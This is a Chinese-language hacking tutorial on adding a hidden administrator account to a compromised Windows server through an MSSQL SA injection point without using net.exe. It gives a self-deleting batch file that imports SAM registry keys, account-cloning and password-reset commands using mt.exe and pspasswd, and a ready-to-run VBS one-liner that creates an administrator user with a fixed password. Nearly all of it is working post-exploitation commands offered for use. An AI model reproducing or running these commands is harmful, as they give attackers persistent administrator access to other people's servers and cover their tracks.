实现无net.exe和net1.exe添加系统用户

大家都知道在windows下添加用户可以在CMD下用net命令来实现
格式为:net user username password /add
意思为添加一个用户名为username密码为password的用户
如果要添加进管理员组还可以用如下命令来实现
net localgroup administrators username /add
这样就把用户名为username的用户加进了管理员组

但是如果不用net.exe和net1.exe是不是就无法添加系统用户了呢？
答案是否定的！

假设我们现在手上有一个SA权限的MSSQL注入点
3389开放并允许连接登录
可以通过注入工具执行任意命令
但是管理员把net.exe和net1.exe改名或者直接删除掉了
当然这样是可以通过上传自己的net.exe和net1.exe再执行添加用户命令
但是为了说明这种方法，我们不采用上传net.exe和net1.exe的方法来解决！

首先要做的就是本地新建一个用户
比如在本地添加一个用户名为hackest的用户
然后导出如下注册表内容：
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\hackest
保存为hackest.reg

再导出注册表内容：
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\下与hackest相对应的键值
比如是000003F6
就导出：
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\000003F6
保存为000003F6.reg

然后再写一个批处理文件，名为add.bat
add.bat文件内容如下：

regedit /s hackest.reg
regedit /s 000003F6.reg
del hackest.reg
del 000003F6.reg
del add.bat

把这三个文件：hackest.reg、000003F6.reg、add.bat传到目标服务器上
运行add.bat文件

上传mt.exe运行mt -chkuser命令
我们会发现已经成功添加了一个用户名为hackest的用户
但是它并不属于任何成员组
所以得把它克隆成管理员
假设管理员用户为administrator，则命令为：
mt -clone administrator hackest
成功克隆为管理员后是不是就可以登录3389了呢？
其实现在还不可以的
因为这个用户的密码问题还没有解决

我们可以用PS系列工具中的pspasswd.exe来解决密码问题
命令格式为：
pspasswd.exe username newpassword
在此例中命令则为：
pspasswd.exe hackest hackest
这样就把用户名为hackest的用户密码更改为hackest了
现在你可以放心地去连接登录3389了，呵呵

其实完全可以通过上传net.exe或net1.exe再执行添加用户的操作来达到目的
不过在这里只是为大家提供一个完全可以不用那两个文件一样能添加用户的思路！echo dim username,password:If Wscript.Arguments.Count > 0 Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="fulldream":password="95277":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"^&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os^&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os^&"/"^&username^&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath >cz.vbs
cscript cz.vbs
del cz.vbs

vbs添加一个fulldream密码95277的用户。

无需net.exe net1.exe 无须上传文件。